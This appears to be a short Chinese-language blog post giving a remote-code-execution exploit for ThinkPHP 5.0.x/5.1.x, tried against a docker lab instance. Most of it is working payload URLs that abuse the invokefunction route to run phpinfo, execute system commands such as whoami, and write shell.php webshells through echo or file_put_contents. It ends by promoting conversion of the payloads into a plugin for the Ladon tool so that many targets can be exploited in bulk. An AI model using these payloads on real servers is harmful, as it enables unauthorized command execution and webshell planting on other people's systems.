天天看點

ThinkPHP 5.0.22 5.1.29 GetShell Exploit

前言

使用Exp生成器生成Ladon插件實戰,ThinkPHP GetShell

漏洞環境

使用docker ThinkPHP 5.0.20

複現測試

Payload:

http://192.168.1.37:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

執行指令

http://192.168.1.37:8080/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

寫入檔案

GetShell1

http://192.168.1.37:8080/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo 111111>shell.php

GetShell2

/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=URL編碼内容

視訊教程

通過EXP生成器将以上Payload轉成DLL,使用Ladon即可批量利用,詳情請觀看視訊教程

Video: K8Cscan ThinkPHP 5.x RCE Exploit

繼續閱讀